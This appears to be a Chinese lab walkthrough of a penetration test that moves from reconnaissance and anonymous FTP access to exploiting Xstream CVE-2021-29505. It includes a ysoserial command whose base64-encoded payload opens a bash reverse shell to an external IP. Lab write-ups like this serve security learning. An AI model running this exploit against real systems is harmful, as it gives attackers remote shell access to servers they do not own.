外网打点
信息搜集
![图片[1]-内网渗透攻击技巧:突破云镜传递防护-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319151547369-image.png)
FTP匿名登录
发现有FTP匿名登录,连接查看
![图片[2]-内网渗透攻击技巧:突破云镜传递防护-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319151605588-image.png)
![图片[3]-内网渗透攻击技巧:突破云镜传递防护-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319151614849-image.png)
漏洞探测
搜索Xstream漏洞,发现
https://www.cnblogs.com/thelostworld/p/14810682.html
尝试CVE-2021-29505
反弹shell
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1098 CommonsCollections6 “bash -c {echo,YmFzaCAtaSAmPiAvZGV2L3RjcC8xMTkuMy4yMTUuMTk4Lzc3NzYgMD4mMQ==}|{base64,-d}|{bash,-i}”
同时开启监听
![图片[4]-内网渗透攻击技巧:突破云镜传递防护-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319151635135-image.png)
© 版权声明
THE END
暂无评论内容